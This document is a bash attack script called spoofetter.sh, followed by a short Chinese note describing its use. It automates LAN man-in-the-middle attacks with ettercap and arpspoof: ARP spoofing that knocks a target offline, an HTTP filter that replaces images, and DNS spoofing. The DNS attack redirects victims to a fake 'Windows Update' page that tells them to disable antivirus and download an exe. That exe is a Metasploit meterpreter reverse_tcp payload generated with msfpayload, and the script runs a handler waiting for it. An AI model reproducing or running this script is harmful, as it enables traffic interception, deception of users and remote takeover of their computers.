#!/bin/bash
#Author: Qingzheng
#2012-11-11
#spoofetter.sh Version 0.1
#Email:[email protected]
function Usage(){
echo -e "$red####################################################$white"
echo -e "$red# ${purple}spoofetter.sh $red#$white"
echo -e "$red# ${purple}Author:Qingzheng $red#$white"
echo -e "$red####################################################$white"
}
function Ettercap_config(){
echo -e "[$blue>$white] Start IPv4 Forward"
echo '1' >/proc/sys/net/ipv4/ip_forward
echo -e "[$blue>$white] Change etter.conf"
grep "iptables -t" /etc/etter.conf | sed -i 's/#//g' /etc/etter.conf
echo -e "[$blue>$white] Start apache"
/etc/init.d/apache2 start &>/dev/null
echo -e "[$blue>$white] Ettercap configure DONE!"
}
function Listening(){
echo -e "[$blue>$white] Make payload /var/www/Windows-KB655723-x86-ENU.exe"
msfpayload windows/meterpreter/reverse_tcp LHOST=$localhost LPORT=3421 R | msfencode -t exe -e x86/shikata_ga_nai -c 10 -o /var/www/Windows-KB655723-x86-ENU.exe
echo -en "use exploit/multi/handler\nset PAYLOAD windows/meterpreter/reverse_tcp\nset LHOST $localhost\nset LPORT 3421\nexploit\n" >$(pwd)/tmp/listening.rc
echo -e "[$blue>$white] Start Listening..."
xterm -hold -geometry 80x15+0+0 -e "msfconsole -r $(pwd)/tmp/listening.rc" &
echo -en "[$blue+$white] Time [ "
t="15"
for h in `seq $t`;do
let p=$t-$h
echo -n "="
for i in `seq 25`; do
if [ "$p" -ge "10" ]; then
sleep 0.01
echo -en "|$p\b\b\b"
sleep 0.01
echo -en "/$p\b\b\b"
sleep 0.01
echo -en "-$p\b\b\b"
sleep 0.01
echo -en "\\\\$p\b\b\b"
else
sleep 0.01
echo -en "|$p\b\b"
sleep 0.01
echo -en "/$p\b\b"
sleep 0.01
echo -en "-$p\b\b"
sleep 0.01
echo -en "\\\\$p\b\b"
fi
done
done
echo " ]"
}
function ARPSpoofAttack(){
for ((i=0;i<=19;i++));do
echo -e "[$blue>$white] Run ARP_Spoof_Attack...processes $i"
arpspoof -i $interface -t $gateway $dsthost &>/dev/null &
done
echo -e "[$blue>$white] Run ARP_Spoof_Attack...processes $i"
arpspoof -i $interface -t $gateway $dsthost
}
function ReplanceBrowseImg(){
echo -e "[$blue>$white] Copy $(pwd) /var/www"
if [ -e $(pwd)/tmp/replancebrowseimg.jpg ]; then
cp -rf $(pwd)/tmp/replancebrowseimg.jpg /var/www
else
echo -e "[$blue>$white] No founding $(pwd)/tmp/replancebrowseimg.jpg"
exit
fi
echo -e "[$blue>$white] Create file replancebrowseimg.src!"
echo "# This is ettercap script
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, \"Accept-Encoding\")) {
replace(\"Accept-Encoding\", \"Accept-Mousecat\");
msg(\"zapped Accept-Encoding!\n\");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace(\"img src=\", \"img src=\"http://$localhost/replancebrowseimg.jpg\" \");
replace(\"IMG SRC=\", \"img src=\"http://$localhost/replancebrowseimg.jpg\" \");
msg(\"Filter Ran.\n\");
}" >$(pwd)/tmp/replancebrowseimg.src
echo -e "`etterfilter $(pwd)/tmp/replancebrowseimg.src -o $(pwd)/tmp/replancebrowseimg.ef | grep -v "^$" | tail -n5 | sed 's/^/[\\\e[01;32m>\\\e[00m]/g'`"
echo -e "[$blue>$white] Compile replancebrowseimg.src DONE!"
echo -e "[$blue>$white] Img path http://$localhost/replancebrowseimg.jpg"
echo -e "[$blue>$white] Run Replance_Browse_Img ..."
ettercap -i $interface -T -q -F $(pwd)/tmp/replancebrowseimg.ef -M arp:remote // /$dsthost/ | sed 's/^/[+] /g'
}
function DNSSpoofAttack(){
echo "<!-- evil html -->
<!DOCTYPE html PUBLIC \"-//W3C//DTD HTML 4.01//EN\" \"http://www.w3.org/TR/1999/REC-html1401-19991224/strict.dtd\">
<html>
<head>
<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\" />
<title>Windows Update</title>
<style type=\"text/css\">
.style2{
font-family:Arial, Helvetica, scans-serif;
font-weight:bold;
font-size:14px;
color:#999999;
}
.style3{
font-family:Arial, Helvetica, scans-serif;
font-weight:bold;
font-size:10px;
color:#999999;
}
</style>
</head>
<body>
<script type=\"text/javascript\">
setInterval(\"webjx.innerHTML=new Date().toLocaleString();\",1000);
document.write(\"Browser name: \"+navigator.appName+\"<hr />\")
</script>
<p align=\"center\" class=\"style2\">High-risk vulnerabilities detected browser<br />Tip: turn off anti-virus software
</p>
<p align=\"center\">
<input align=\"center\" type=\"button\" name=\"Button\" value=\"Download Update\" onClick=\"window.open('/Windows-KB655723-x86-ENU.exe','download'); return false;\"></p><br />
<div align=\"center\" id=\"webjx\" class=\"style3\"></div>
</body>
</html>
" >/var/www/index.html
Listening
if [ ! -e "/usr/local/share/ettercap/etter.dns.old" ]; then
if [ -e /usr/local/share/ettercap/etter.dns ]; then
mv /usr/local/share/ettercap/etter.dns /usr/local/share/ettercap/etter.dns.old
echo -e "[$blue>$white] Backup etter.dns.old"
else
echo -e "[$blue>$white] No founding /usr/local/share/ettercap/etter.dns"
echo -e "[$blue>$white] Create new file /usr/local/share/ettercap/etter.dns"
touch /usr/local/share/ettercap/etter.dns
fi
else
echo -e "[$blue>$white] Alredy backup etter.dns.old"
fi
echo -e "[$blue>$white] Change etter.dns"
echo "* A $localhost" >/usr/local/share/ettercap/etter.dns
echo -e "[$blue>$white] Run DNS_Spoof_Attack..."
xterm -geometry 80x15+0+230 -e "ettercap -i $interface -T -q -P dns_spoof -M arp:remote // /$dsthost/" &
}
#################################################################
######### Main ################################
#################################################################
function Main(){
blue="\e[01;34m"
red="\e[00;31m"
green="\e[00;32m"
purple="\e[00;35m"
white="\e[00m"
underline="\\033[4m"
while [ True ]; do
Usage
allinterface=`ifconfig | grep "Link encap" | awk '{print $1}' | grep -v "lo" | grep -n "" | sed 's/^/[/g' | sed 's/:/]: /g'`
echo -e "$purple${allinterface}$white"
echo -en "${underline}Interface$white:$blue>>$white "
read numinterface
interface=`echo "$allinterface" | grep "\[$numinterface\]" | cut -d' ' -f2`
localhost=`ifconfig $interface | grep "inet addr" | grep -v "127.0.0.1" | cut -d':' -f2 | awk '{print $1}'`
gateway=`route -n | grep "UG" | awk '{print $2}' | uniq`
echo -e "[$blue>$white] Local IP: $green${localhost}$white"
echo -e "[$blue>$white] Gateway: $green${gateway}$white"
echo -e "[$blue>$white] Online Host!!"
a=`nmap -T4 -sn -n $localhost/24`
scanhost=`echo "$a" | grep "Nmap scan" | cut -d' ' -f5 | grep -v "$localhost" | grep -n "" | sed -e 's/^/[/g' -e 's/:/]: /g'`
b=`echo "$a" | grep "MAC Address:" | awk 'FS=" " {print $3 $4 $5 $6 $7 $8 $9}'`
c=`echo "$scanhost" | wc -l`
for ((i=1;i<$c+1;i++));do
if [ $i%2==1 ]; then
u=$(echo -en "`echo "$scanhost" | sed -n ${i}p`\t" && echo "$b" | sed -n ${i}p)
echo -e "$purple${u}$white"
else
v=$(echo -en "`echo "$scanhost" | sed -n ${i}p`\t" && echo "$b" | sed -n ${i}p)
echo -e "$purple${v}$white"
fi
done
echo -en "${underline}Dstination host$white:$blue>>$white "
read numdsthost
dsthost=`echo "$scanhost" | grep "\[$numdsthost\]" | cut -d' ' -f2`
Attoption=`echo -e "ARP_Spoof_Attack\nReplance_Browse_Img\nDNS_Spoof_Attack" | grep -n "" | sed -e 's/^/[/g' -e 's/:/]: /g'`
echo -e "${purple}$Attoption${white}"
echo -en "${underline}Attack Option${white}:$blue>>$white "
read numattack
attackoption=`echo "$Attoption" | grep "\[$numattack\]" | cut -d' ' -f2`
Ettercap_config
case $attackoption in
"ARP_Spoof_Attack")
ARPSpoofAttack
;;
"Replance_Browse_Img")
ReplanceBrowseImg
;;
"DNS_Spoof_Attack")
DNSSpoofAttack
;;
esac
echo
done
}
Main
這個腳本有第一個功能arp欺騙斷網攻擊,第二個照片替換,不過經測試這個替換效果不好,過濾規則也沒大寫好,最後一個就是arp dns欺騙,並僞造成升級網頁,誘騙用戶下載雙擊exe文件,反彈一個shell.